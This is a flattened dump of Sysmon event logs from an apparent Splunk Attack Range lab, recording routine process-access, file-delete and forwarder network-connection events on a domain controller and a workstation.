08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.094{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.094{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.094{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.094{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:42.902{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE1CE398C0846A884002BAB59B90C0DD,SHA256=BCB4191A176138F3C12CACE7935E58BDC2E05C0208AC1699FFABBAE1BDC51562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:42.509{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C40F1449BFF231DC0DB28C9C3A4D429,SHA256=F77C52B1539330B4C1DB65FF00083A5688CA7EFEF29D7BE56237B0CBD59A84F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:41.222{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57436-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001053944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:33.721{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61938-false10.0.1.12-8000- 23542300x8000000000000000810024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:43.902{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98E85645F36F63E782C69ADAAEA947A6,SHA256=36300C888A9E92C8FAD77F3E3051DCE92F7B49B1584375BBCE4F5941D1224569,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:43.523{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C7F871160410A80B95985F39B12A938,SHA256=97E000BF2E93344A01E90380C63E5937FE22B17E5BFEAF8D2300A244EA343C6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:44.902{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DC472DB274671137437C0D6DF067AB1,SHA256=0880DC2062D5FEBA4EEFE77C4F80BFFD7234B61D9E06801666F0C49262912661,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:44.541{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13876A7C8C787FB051FFADED7CCC6490,SHA256=34F4CBA0DCFAF2A3959E2F6A683908B0F4B577707D42FEC7E5BF1970C891BDFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:45.933{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=965C52BE02A97F4C58F244A66A05BFA3,SHA256=A7886117F4763EBDB467CA3ADA596F3BA2A32EAD3C829073C709C153950B4892,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.842{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.842{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.842{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.841{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.841{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 